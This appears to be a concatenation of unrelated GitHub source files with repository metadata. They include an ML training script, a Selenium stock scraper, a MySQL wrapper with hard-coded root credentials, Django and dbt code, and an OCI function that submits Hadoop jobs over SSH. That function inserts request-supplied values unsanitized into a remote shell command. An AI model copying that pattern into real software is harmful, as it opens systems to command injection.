print("ubahjumlah - untuk mengubah jumlah gadget dan consumable dalam sistem")
print("riwayatkembali - untuk melihat riwayat pengembalian gadget")
print("riwayatambil - untuk melihat riwayat pengambilan consumable")
else:#curret_role=='user'
print("pinjam - untuk melakukan peminjaman gadget")
print("kembalikan - untuk mengembalikan gadget")
print("minta - untuk meminta consumable yang tersedia")
print("save - untuk melakukan penyimpanan data")
print("help - untuk panduan penggunaan penggunaan sistem")
print("exit - untuk keluar dari aplikasi")
#F17 - Exit
if pilihan == 'exit':
pil = input("Apakah anda mau melakukan penyimpanan file yang sudah diubah? (y/n)")
if pil == "y" or pil == "Y":
path = input("Masukkan Folder tempat file akan di save: ")
save(path, user, gadget, consumable, consumable_history, gadget_borrow_history, gadget_return_history)
break
#FB01 - Hashing
#Done pada hashing.py
#FB02 - Mengembalikan Gadget Secara Parsial
#Done
#FB03 - Gacha
if pilihan=='gacha':
#Validasi User
#Sementara id digenerate otomatis. Nantinya current id
id=1
gacha(id,consumable,consumable_history) | bryanbernigen/TubesSem2 | main.py | main.py | py | 8,850 | python | id | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.getcwd",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_nu... |
73485605863 | import argparse
import os
import uuid
import numpy as np
import torch
from torch import optim
from torch.nn import functional
from torch.utils.data import DataLoader
from datasets import load_metric
import albumentations
from albumentations.pytorch import ToTensorV2
from tqdm import tqdm
from utils import set_seed, load_config
from dataset import HarborClassificationDataset, HarborSegmentationDataset
from model import TwinHeadSegformerForSemanticSegmentation
parser = argparse.ArgumentParser(description="Train twin head segformer")
parser.add_argument("--seed", type=int, default=None)
parser.add_argument("--id", type=str, default=None)
parser.add_argument("--num_epochs", type=int, default=None)
args = parser.parse_args()
if args.seed is not None:
set_seed(args.seed)
train_id = args.id
if train_id is None:
train_id = uuid.uuid4().hex
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
config = load_config(os.path.join(os.path.dirname(__file__), "config.yaml"))
train_config = config["train"]["twin_head"]
model_name = config["pretrained_model_name"]
label2id = {k: v + 1 for k, v in config["label2id"].items()}
label2id["background"] = 0
id2label = {v: k for k, v in label2id.items()}
transform = albumentations.Compose([
albumentations.CoarseDropout(
max_holes=16, max_height=0.1, max_width=0.1, min_height=0.05, min_width=0.05, p=0.5
),
albumentations.HorizontalFlip(p=0.5),
albumentations.SafeRotate(15, p=0.5),
albumentations.GaussNoise(p=0.5),
albumentations.OpticalDistortion(p=0.5),
albumentations.OneOf([
albumentations.RGBShift(),
albumentations.RandomToneCurve(),
albumentations.InvertImg(),
albumentations.ToGray()
]),
ToTensorV2()
])
classifier_train_dataset = HarborClassificationDataset.from_config(config)
classifier_train_dataset.set_transform(transform)
train_dataset = HarborSegmentationDataset.from_config(config)
train_dataset.set_transform(transform)
classifier_train_dataloader = DataLoader(
classifier_train_dataset, batch_size=train_config["classifier_batch_size"], shuffle=True
)
train_dataloader = DataLoader(
train_dataset, batch_size=train_config["batch_size"], shuffle=True
)
model = TwinHeadSegformerForSemanticSegmentation.from_pretrained(
model_name,
num_labels=len(id2label),
id2label=id2label,
label2id=label2id,
ignore_mismatched_sizes=True
)
model.to(device)
optimizer = optim.AdamW(
model.parameters(),
lr=float(train_config["learning_rate"]),
weight_decay=float(train_config["weight_decay"])
)
accumulation_steps = train_config["accumulation_steps"]
losses = []
f1_metric = load_metric("f1")
miou_metric = load_metric("mean_iou")
model.train()
num_epochs = args.num_epochs
if num_epochs is None:
num_epochs = train_config["num_epochs"]
step = 0
for epoch in range(1, num_epochs + 1):
for (classifier_pixel_values, classifier_labels), segmenter_batch in tqdm(
zip(classifier_train_dataloader, train_dataloader),
train_id,
total=min(len(classifier_train_dataloader), len(train_dataloader))
):
step += 1
classifier_pixel_values = classifier_pixel_values.to(device)
classifier_labels = classifier_labels.to(device)
pixel_values = segmenter_batch["pixel_values"].to(device)
labels = segmenter_batch["labels"].to(device)
outputs = model(
classifier_pixel_values=classifier_pixel_values,
classifier_labels=classifier_labels,
pixel_values=pixel_values,
labels=labels
)
classifier_logits, logits = outputs.classifier_logits, outputs.logits
loss = (outputs.classifier_loss + outputs.loss) / 2
loss /= accumulation_steps
losses.append(loss.item())
loss.backward()
if step % accumulation_steps == 0:
optimizer.step()
optimizer.zero_grad()
f1_metric.add_batch(
predictions=classifier_logits.argmax(dim=-1).detach().cpu().numpy(),
references=classifier_labels.detach().cpu().numpy()
)
if epoch % train_config["eval_frequency"] == 0:
with torch.no_grad():
upsampled_logits = functional.interpolate(
logits,
size=labels.shape[-2:],
mode="bilinear",
align_corners=False
)
predicted = upsampled_logits.argmax(dim=1)
miou_metric.add_batch(
predictions=predicted.detach().cpu().numpy(),
references=labels.detach().cpu().numpy()
)
micro_f1 = f1_metric.compute(average="micro")["f1"]
if epoch % train_config["eval_frequency"]:
print(
f"epoch: {epoch}\n"
f"├─ loss: {np.mean(losses[-100:]):.6f}\n"
f"└─ micro f1: {micro_f1:.4f}\n"
)
else:
miou_metrics = miou_metric.compute(
num_labels=len(id2label), ignore_index=label2id["background"], reduce_labels=False
)
print(
f"epoch: {epoch}\n"
f"├─ loss: {np.mean(losses[-100:]):.6f}\n"
f"├─ micro f1: {micro_f1:.4f}\n"
f"├─ mIoU: {miou_metrics['mean_iou']:.4f}\n"
f"└─ mAcc: {miou_metrics['mean_accuracy']:.4f}\n"
)
torch.save(model, os.path.join(os.path.dirname(__file__), "checkpoints", f"{train_id}_{epoch}.pt"))
| lexiconium/2022_ai_online_competition-sementic_segmentation | train_twin_head_segformer.py | train_twin_head_segformer.py | py | 5,536 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "utils.set_seed",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "uuid.uuid4",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "torch.device",
... |
8490770607 | #%%
import numpy as np
import pandas as pd
from sklearn import metrics
from matplotlib import pyplot as plt
import glob
#%%
class Takens:
'''
constant
'''
tau_max = 30
'''
initializer
'''
def __init__(self, data,tau=None):
self.data = data
if tau is None:
self.tau, self.nmi = self.__search_tau()
else:
self.tau = tau
'''
reconstruct data by using searched tau
'''
def reconstruct(self):
_data1 = self.data[:-2]
_data2 = np.roll(self.data, -1 * self.tau)[:-2]
_data3 = np.roll(self.data, -2 * self.tau)[:-2]
return np.array([_data1, _data2, _data3])
'''
find tau to use Takens' Embedding Theorem
'''
def __search_tau(self):
# Create a discrete signal from the continunous dynamics
hist, bin_edges = np.histogram(self.data, bins=200, density=True)
bin_indices = np.digitize(self.data, bin_edges)
data_discrete = self.data[bin_indices]
# find usable time delay via mutual information
before = 1
nmi = []
res = None
for tau in range(1, self.tau_max):
unlagged = data_discrete[:-tau]
lagged = np.roll(data_discrete, -tau)[:-tau]
nmi.append(metrics.normalized_mutual_info_score(unlagged, lagged))
if res is None and len(nmi) > 1 and nmi[-2] < nmi[-1]:
res = tau - 1
if res is None:
res = 50
return res, nmi
class Dataset:
def __init__(self,dir_list):
self.root_path_list = dir_list
for dir in self.root_path_list:
path_list = glob.glob(os.path.join(dir, "*.csv"), recursive=True)
if len(path_list)==0:
print(f"Cannot find any files inside {dir}")
self.exp_path_list.extend(path_list)
# self.exp_path_list = [p.replace('./', '') for p in self.exp_path_list if 'old' not in p]
# print(self.exp_path_list)
for path in self.exp_path_list:
df = pd.read_csv(path)
self.eigenworm_exp_list.append(np.array(df.loc[:,self.var_name]))
[self.behavior_label_dict[k].append(df.loc[:,k].values) for k in self.behavior_label_name]
self.stimulus_list.append(np.array(df.loc[:,'led']))
#%%
import itertools
import os
var_name = ['a_1','a_2','a_3','a_4','a_5','VelocityTailToHead']
root_path_list = ['data/141_ASH_02/']
exp_path_list = []
for dir in root_path_list:
path_list = glob.glob(os.path.join(dir, "*.csv"), recursive=True)
if len(path_list)==0:
print(f"Cannot find any files inside {dir}")
exp_path_list.extend(path_list)
dataset = {}
for i, name in enumerate(var_name):
eigenworm_exp_list = []
d = []
for path in exp_path_list:
df = pd.read_csv(path)
d.append(np.array(df.loc[:,name]))
d_1D = list(itertools.chain.from_iterable(d))
dataset[name] = d_1D
#%%
# eigenworm_exp_list = np.array(eigenworm_exp_list)
#
fig, axs = plt.subplots(6,2, figsize=(15,30))
plt_sample_size = 30000
for i, name in enumerate(var_name):
takens = Takens(dataset[name],tau=10)
emd = takens.reconstruct()
tau = takens.tau
axs[i,0].scatter(emd[0,:plt_sample_size],emd[1,:plt_sample_size],s=1,c=dataset["VelocityTailToHead"][:plt_sample_size])
axs[i,1].plot(emd[0,:10000],emd[1,:10000],lw=0.2)
axs[i,0].set_title(name+'\n'+'tau:'+str(tau))
axs[i,1].set_title(name+'\n'+'tau:'+str(tau))
plt.show()
#%%
fig.savefig("tde.png",dpi=150)
#%%
position = np.array(df.loc[:,["posCentroidX","posCentroidY"]])
velocity = np.array(df.loc[:,["VelocityTailToHead"]])
#%%
# plt.plot(emd[0,:1000],emd[1,:1000],'gray',lw=0.1)
plt.scatter(emd[0,:60000],emd[2,:60000],s=1,c=dataset["VelocityTailToHead"][:60000])
plt.savefig('tde_velocity_all.png',dpi=150)
#%%
| kei-mo/BehavCrassificationElegans_TDE | tde.py | tde.py | py | 3,519 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.roll",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.roll",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.histogram",
"line_number"... |
70477030183 | import os
import pandas as pd
from selenium import webdriver
from selenium.webdriver.common.by import By
from lxml import etree
browser = webdriver.Chrome()
browser.maximize_window() # 창 최대화
# 1. 페이지 이동
url = 'https://finance.naver.com/sise/sise_market_sum.naver?&page='
browser.get(url) # 해당 url로 페이지 이동
# 2. 조회 항목 초기화 (체크 되어 있는 항목 체크 해제)
checkboxes = browser.find_elements(By.NAME, 'fieldIds') # 해당 브라우저(네이버 주식)에 elements들을 찾는데 그 중에 name 속성이 fieldIds인 것들만 찾아 변수에 담아주기
for checkbox in checkboxes:
if checkbox.is_selected(): # 체크된 상태라면
checkbox.click() # 기존 클릭되어 있는걸 다시 클릭하여 클릭 해제 시킨다.
# 3. 조회 항목 설정 (원하는 항목)
items_to_select = ['영업이익', '자산총계', '매출액']
for checkbox in checkboxes:
parent = checkbox.find_element(By.XPATH, '..') # 부모 element를 찾는다. 즉, 여기선 <td> 태그를 찾는다
label = parent.find_element(By.TAG_NAME, 'label') # <td> 태그 안에 있는 label을 찾는다
# print(label.text) # 이름 확인
if label.text in items_to_select: # 선택 항목과 일치 한다면
checkbox.click() # 체크
# 4. 적용하기 버튼 클릭
btn_apply = browser.find_element(By.XPATH, '//a[@href="javascript:fieldSubmit()"]') # //은 html 전체 문서에서 찾겠다는 의미
btn_apply.click()
for idx in range(1, 40): # 1~40 미만 반복
# 4.5 사전작업 : 페이지 이동
browser.get(url + str(idx)) # e.g) https://finance/naver.com/~~~&=1~2...
# 5. 데이터 추출
df = pd.read_html(browser.page_source)[1]
# 데이터 결측치란? 데이터에 값이 없다는 것을 뜻 함. NaN, NA, 료ull
# axis='index' : row 기준으로 삭제,
# how='all' : row(줄) 전체가 데이터가 없다면 지움
# inplace=True : 데이터 반영
df.dropna(axis='index', how='all', inplace=True)
df.dropna(axis='columns', how='all', inplace=True)
if len(df) == 0: # 더 이상 가져올 데이터가 없으면?
break
# 6. 파일 저장 => import os
f_name = 'sise.csv'
if os.path.exists(f_name): # 파일이 있다면? 헤더 제외
df.to_csv(f_name, encoding='utf-8-sig', index=False, mode='a', header=False) # 헤더 제외하고 append 해서 데이터 넣기
else: # 파일이 없다면? 헤더 포함. 즉, 처음 파일 만들 때
df.to_csv(f_name, encoding='utf-8-sig', index=False)
print(f'{idx} 페이지 완료')
browser.quit() # 브라우저 종료 | thisiswoo/python_practice | naver_stock_crawling/market_cap.py | market_cap.py | py | 2,652 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "selenium.webdriver.common.by.By.NAME",
"line_number": 15,
"usage_type": "attribute"
},
{
... |
24065321916 | import os
import psutil
import platform
from gns3server.web.route import Route
from gns3server.config import Config
from gns3server.schemas.version import VERSION_SCHEMA
from gns3server.compute.port_manager import PortManager
from gns3server.version import __version__
from aiohttp.web import HTTPConflict
class ServerHandler:
@Route.get(
r"/version",
description="Retrieve the server version number",
output=VERSION_SCHEMA)
def version(request, response):
config = Config.instance()
local_server = config.get_section_config("Server").getboolean("local", False)
response.json({"version": __version__, "local": local_server})
@Route.get(
r"/debug",
description="Return debug informations about the compute",
status_codes={
201: "Writed"
})
def debug(request, response):
response.content_type = "text/plain"
response.text = ServerHandler._getDebugData()
@staticmethod
def _getDebugData():
try:
addrs = ["* {}: {}".format(key, val) for key, val in psutil.net_if_addrs().items()]
except UnicodeDecodeError:
addrs = ["INVALID ADDR WITH UNICODE CHARACTERS"]
data = """Version: {version}
OS: {os}
Python: {python}
CPU: {cpu}
Memory: {memory}
Networks:
{addrs}
""".format(
version=__version__,
os=platform.platform(),
python=platform.python_version(),
memory=psutil.virtual_memory(),
cpu=psutil.cpu_times(),
addrs="\n".join(addrs)
)
try:
connections = psutil.net_connections()
# You need to be root for OSX
except psutil.AccessDenied:
connections = None
if connections:
data += "\n\nConnections:\n"
for port in PortManager.instance().tcp_ports:
found = False
for open_port in connections:
if open_port.laddr[1] == port:
found = True
data += "TCP {}: {}\n".format(port, found)
for port in PortManager.instance().udp_ports:
found = False
for open_port in connections:
if open_port.laddr[1] == port:
found = True
data += "UDP {}: {}\n".format(port, found)
return data
| vieyahn/docker-cisco-lab | gns3server/gns3server/handlers/api/compute/server_handler.py | server_handler.py | py | 2,414 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "gns3server.config.Config.instance",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "gns3server.config.Config",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "gns3server.version.__version__",
"line_number": 23,
"usage_type": "name"
},
... |
26259789038 | # Problem : Inverse Geodesic using GeographicLib
from geographiclib.geodesic import Geodesic
geod = Geodesic.WGS84 # กำหนดให้เป็นแบบจำลอง WGS84
def Geodesic_Inverse( lat1, lng1, lat2, lng2 ): # สร้างฟังก์ชันเพื่อหา Geodesic ด้วยวิธิ Inverse
result = geod.Inverse(lat1, lng1, lat2, lng2)
# กำหนด result เพื่อรองรับผลลัพธ์จากการเรียกใช้ Geodesic
fwd_Az1, fwd_Az2, s12 = result['azi1'], result['azi2'], result['s12']
# กำหนด forward แอซิมัธของจุดต้นทางและเก็บค่าแอซิมัธ
return fwd_Az1, fwd_Az2, s12
fwd_Az1, fwd_Az2, s12 = Geodesic_Inverse( 52.30861, 4.76389, 26.27083, 50.6336 )
# เก็บค่าที่ออกมาจากการใช้ฟังก์ชันไว้ในตัวแปรทั้งสามตัว
print(' fwd_Az1 | fwd_Az2 | Distance')
print( ' {:.5f} {:.5f} {:.3f} m. '.format(fwd_Az1, fwd_Az2, s12))
| isara-c/Geodesy-SurveyEng | GeodesicAirliner.py | GeodesicAirliner.py | py | 1,163 | python | th | code | 0 | github-code | 36 | [
{
"api_name": "geographiclib.geodesic.Geodesic.WGS84",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "geographiclib.geodesic.Geodesic",
"line_number": 4,
"usage_type": "name"
}
] |
14934819007 | import pytest
from dbt.tests.adapter.utils.data_types.test_type_bigint import BaseTypeBigInt
from dbt.tests.adapter.utils.data_types.test_type_bigint import (
models__actual_sql as bigint_model,
)
from dbt.tests.adapter.utils.data_types.test_type_bigint import (
models__expected_sql as bigint_expected,
)
from dbt.tests.adapter.utils.data_types.test_type_boolean import (
BaseTypeBoolean,
)
from dbt.tests.adapter.utils.data_types.test_type_boolean import (
models__actual_sql as bool_model,
)
from dbt.tests.adapter.utils.data_types.test_type_float import BaseTypeFloat
from dbt.tests.adapter.utils.data_types.test_type_float import (
models__actual_sql as float_model,
)
from dbt.tests.adapter.utils.data_types.test_type_int import BaseTypeInt
from dbt.tests.adapter.utils.data_types.test_type_int import (
models__actual_sql as int_model,
)
from dbt.tests.adapter.utils.data_types.test_type_numeric import (
BaseTypeNumeric,
)
from dbt.tests.adapter.utils.data_types.test_type_numeric import (
models__actual_sql as num_model,
)
from dbt.tests.adapter.utils.data_types.test_type_string import BaseTypeString
from dbt.tests.adapter.utils.data_types.test_type_string import (
models__actual_sql as string_model,
)
from dbt.tests.adapter.utils.data_types.test_type_timestamp import (
BaseTypeTimestamp,
)
from dbt.tests.adapter.utils.data_types.test_type_timestamp import (
models__actual_sql as ts_model,
)
from firebolt import __version__ as sdk_version
schema_actual_table_yml = """
version: 2
models:
- name: actual
config:
materialized: table
"""
schema_expected_table_yml = """
version: 2
models:
- name: expected
config:
materialized: table
"""
class TestTypeBigInt(BaseTypeBigInt):
@pytest.fixture(scope='class')
def models(self):
return {
'expected.yml': schema_expected_table_yml,
'expected.sql': bigint_expected,
'actual.yml': schema_actual_table_yml,
'actual.sql': self.interpolate_macro_namespace(bigint_model, 'type_bigint'),
}
class TestTypeFloat(BaseTypeFloat):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(float_model, 'type_float'),
'actual.yml': schema_actual_table_yml,
}
class TestTypeInt(BaseTypeInt):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(int_model, 'type_int'),
'actual.yml': schema_actual_table_yml,
}
@pytest.mark.skipif(
sdk_version <= '0.15.0', reason='Decimal type implemented in firebolt-sdk>0.15.0'
)
class TestTypeNumeric(BaseTypeNumeric):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(num_model, 'type_numeric'),
'actual.yml': schema_actual_table_yml,
}
class TestTypeString(BaseTypeString):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(string_model, 'type_string'),
'actual.yml': schema_actual_table_yml,
}
class TestTypeTimestamp(BaseTypeTimestamp):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(ts_model, 'type_timestamp'),
'actual.yml': schema_actual_table_yml,
}
@pytest.mark.skip('True boolean is feature-flagged')
class TestTypeBoolean(BaseTypeBoolean):
@pytest.fixture(scope='class')
def models(self):
return {
'actual.sql': self.interpolate_macro_namespace(bool_model, 'type_boolean'),
'actual.yml': schema_actual_table_yml,
}
| firebolt-db/dbt-firebolt | tests/functional/adapter/utils/test_data_types.py | test_data_types.py | py | 3,823 | python | en | code | 26 | github-code | 36 | [
{
"api_name": "dbt.tests.adapter.utils.data_types.test_type_bigint.BaseTypeBigInt",
"line_number": 58,
"usage_type": "name"
},
{
"api_name": "dbt.tests.adapter.utils.data_types.test_type_bigint.models__expected_sql",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "dbt.t... |
32527451220 | import requests
from bs4 import BeautifulSoup
from multiprocessing import Pool
def get_web_source():
with open('pylib_data.html','r') as r:
data = r.read()
return data
#print(data)
def get_url_list(web_source):
#url = 'https://www.lfd.uci.edu/~gohlke/pythonlibs/'
base_url = 'https://download.lfd.uci.edu/pythonlibs/h2ufg7oq/'
#try:
# web_source = requests.get(url).text
#except:
# print('请求失败!')
soup = BeautifulSoup(web_source,'lxml')
names = soup.select('.pylibs li ul li a')
url_list = []
str1 = names[0].text
#str2 = str1.encode('utf-8').decode('windows-1252')
#str2.encode('windows-1252').decode('utf-8')
print(str1)
print(str1)
for name in names:
#name1 = str(name.text)
#name1.replace(' ','_')
#print(name1)
url = base_url+name.text
#print(url)
if '.whl' in url:
print(url)
url_list.append(url)
with open('E:\\Desktop\\url.txt','a',encoding='utf-8') as f:
f.write(url+'\n')
return url_list
#web_source = get_web_source()
#url_list = get_url_list(web_source)
#print(url_list)
def download_whl(url):
try:
source = requests.get(url)
except:
print('请求资源错误!')
file_name = url.split('/')[-1]
print('正在下载:'+file_name)
with open('E:\\Desktop\\python_whl\\'+file_name,'wb') as f:
f.write(source.content)
#download_whl('https://download.lfd.uci.edu/pythonlibs/h2ufg7oq/ad3_2.2.1_cp27_cp27m_win32.whl')
def main():
pool = Pool(20)
web_source = get_web_source()
url_list = get_url_list(web_source)
#print(url_list)
pool.map(download_whl,url_list)
pool.close()
if __name__ == '__main__':
main()
| MrDannyWu/DannyPythonStudy | py_script/get_python_libs.py | get_python_libs.py | py | 1,785 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "bs4.BeautifulSoup",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Pool",
"line_number": 52,
"usage_type": "call"
}
] |
37088074525 | # -*- coding: utf-8 -*-
import MySQLdb as MySQL # pip install mysqlclient
class WorkWithDb:
def __init__(self):
pass
def perform_connection(self):
try_connection_count = 0
print("Подключение к базе...")
while try_connection_count <= 3:
try:
self.db = MySQL.connect(host="127.0.0.1", user="root", passwd="root", db="lazy24", charset="utf8mb4")
print("Установлено соединение")
try_connection_count = 0
return True
except Exception:
try_connection_count += 1
if try_connection_count <= 3:
print(f"Не удается подключиться к базе, выполняется попытка подключиться"
f" № {try_connection_count}...")
else:
print("!!! Ошибка: Проблема с подключением к базе. Проверьте ваше интернет соединение")
return False
def close_connection(self):
self.db.close()
def load_data(self, text_query):
try_count = 0
with self.db.cursor() as cur:
try:
# Запрос на получение данных
cur.execute(text_query)
# Извлечение данных
self.data = cur.fetchall()
print("Данные загружены")
except Exception:
print(f"Нет подключения к базе, выполняется попытка подключиться...")
if self.perform_connection():
self.load_data(text_query)
def insert_data(self, data):
with self.db.cursor() as cur:
try:
# Запрос на занесение данных
cur.execute(data)
# Подтверждение
self.db.commit()
cur.close()
except Exception:
print(f"Нет подключения к базе, выполняется попытка подключиться...")
if self.perform_connection():
self.load_data(data)
def load_column_data(self, shipments_name):
with self.db.cursor() as cur:
try:
# Получаем названия столбцов таблицы
cur.execute = cur.execute("""SHOW COLUMNS FROM {};""".format(shipments_name))
columns_names = cur.fetchall()
self.columns_names = [item[0] for item in columns_names]
print("Название колонок загружено")
cur.close()
except Exception:
print("Нет подключения к базе, выполняется попытка подключиться...")
if self.perform_connection():
self.load_column_data(shipments_name)
def get_data(self):
return self.data
def get_columns_names(self):
return self.columns_names
| Swarmi24/Lazy24 | workwithdb.py | workwithdb.py | py | 3,260 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "MySQLdb.connect",
"line_number": 15,
"usage_type": "call"
}
] |
9395923393 | import oci
import paramiko
import json
def submit_hadoop_job(job_params):
ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()
instance_ip = "YOUR_INSTANCE_IP"
private_key_path = "/path/to/your/private/key"
# Connect to the Hadoop cluster using SSH
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_key = paramiko.RSAKey(filename=private_key_path)
ssh_client.connect(hostname=instance_ip, username="opc", pkey=ssh_key)
# Submit the Hadoop job using SSH
command = f'hadoop jar {job_params["jar_path"]} {job_params["job_class"]} {job_params["input_path"]} {job_params["output_path"]}'
stdin, stdout, stderr = ssh_client.exec_command(command)
# Close SSH connection
ssh_client.close()
return stdout.read()
def handle_request(request):
try:
job_params = {
"jar_path": request.get("jar_path"),
"job_class": request.get("job_class"),
"input_path": request.get("input_path"),
"output_path": request.get("output_path")
}
job_status = submit_hadoop_job(job_params)
return {
"message": "Hadoop job submitted successfully",
"job_status": job_status.decode('utf-8')
}
except Exception as e:
return {
"error": str(e)
}
def handler(ctx, data):
try:
request = json.loads(data.decode('utf-8'))
response = handle_request(request)
return response
except Exception as e:
return {
"error": str(e)
}
| rclevenger-hm/oci-hadoop-job-automation | function/submit_hadoop_job.py | submit_hadoop_job.py | py | 1,588 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "paramiko.SSHClient",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "paramiko.AutoAddPolicy",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "paramiko.RSAKey",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "json.loads",... |
12085831934 | from django.urls import re_path, include
from registration import views
from django.contrib.auth import views as auth_views
urlpatterns = [
re_path(r'^login/$', auth_views.login, name='login'),
re_path(r'^logout/$', auth_views.logout, {'next_page': '/'}, name='logout'),
re_path(r'^signup/$', views.signup, name='signup'),
re_path(r'^profile/(?P<pk>\d+)$', views.view_profile, name='view_profile'),
re_path(r'^profile/(?P<pk>\d+)$', views.view_profile, name='edit_profile'),
re_path(r'^approve', views.approve_and_close, name='approve_and_close')
]
| rgeurgas/Sid | registration/urls.py | urls.py | py | 575 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.re_path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.views.login",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.contrib.auth.views",
"line_number": 7,
"usage_type": "name"
},
{
"a... |
31266470749 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('text', models.TextField(blank=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
],
),
migrations.CreateModel(
name='Like',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('slug', models.CharField(max_length=220, blank=True)),
('description', models.TextField(blank=True)),
('price', models.DecimalField(max_digits=16, decimal_places=2)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
('modified_at', models.DateTimeField(default=django.utils.timezone.now)),
],
),
migrations.AddField(
model_name='like',
name='product',
field=models.ForeignKey(default=None, to='product.Product'),
),
migrations.AddField(
model_name='like',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='comment',
name='product',
field=models.ForeignKey(to='product.Product'),
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(default=None, blank=True, to=settings.AUTH_USER_MODEL),
),
migrations.AlterUniqueTogether(
name='like',
unique_together=set([('product', 'user')]),
),
]
| unkvuzutop/product | product/migrations/0001_initial.py | 0001_initial.py | py | 2,443 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.swappable_dependency",
"line_number": 12,
"usage_type": "call... |
28721703847 | import warnings
import statsmodels.api as sm
from statsmodels.stats.outliers_influence import variance_inflation_factor
def print_vif(x):
"""Utility for checking multicollinearity assumption
:param x: input features to check using VIF. This is assumed to be a pandas.DataFrame
:return: nothing is returned the VIFs are printed as a pandas series
"""
# Silence numpy FutureWarning about .ptp
with warnings.catch_warnings():
warnings.simplefilter("ignore")
x = sm.add_constant(x)
vifs = []
for i in range(x.shape[1]):
vif = variance_inflation_factor(x.values, i)
vifs.append(vif)
print('VIF results\n-------------------------------')
print(pd.Series(vifs, index=x.columns))
print('-------------------------------\n') | Ninjaneer1/theWorks | print_vif.py | print_vif.py | py | 803 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "warnings.catch_warnings",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "warnings.simplefilter",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "statsmodels.api.add_constant",
"line_number": 15,
"usage_type": "call"
},
{
"api_na... |
18395372288 | """
Produce the feature importance matrices for the trained RF models as in Figures 4-6 of Appleby+2023.
"""
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import pickle
import sys
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor
from sklearn import preprocessing
from sklearn.metrics import r2_score, explained_variance_score, mean_squared_log_error, mean_squared_error
from scipy.stats import pearsonr
np.random.seed(1)
plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=16)
if __name__ == '__main__':
model = sys.argv[1]
wind = sys.argv[2]
snap = sys.argv[3]
line = sys.argv[4]
features = ['N', 'b', 'EW', 'dv', 'r_perp', 'mass', 'ssfr', 'kappa_rot']
predictors = ['delta_rho', 'T', 'Z']
features_pretty = [r'${\rm log} N$', r'$b$', r'${\rm log\ EW}$',
r'${\rm d}v$', r'$f_{r200}$', r'${\rm log} M_\star$',
r'${\rm sSFR}$', r'$\kappa_{\rm rot}$']
predictors_pretty = [r'${\rm log}\ \delta$', r'${\rm log}\ T$', r'${\rm log}\ Z$']
lines = ["H1215", "MgII2796", "CII1334", "SiIII1206", "CIV1548", "OVI1031"]
lines_short = ['HI', 'MgII', 'CII', 'SiIII', 'CIV', 'OVI']
zsolar = [0.0134, 7.14e-4, 2.38e-3, 6.71e-4, 2.38e-3, 5.79e-3]
model_dir = './models/'
cmap = sns.color_palette("flare_r", as_cmap=True)
fig, ax = plt.subplots(1, 3, figsize=(18, 9))
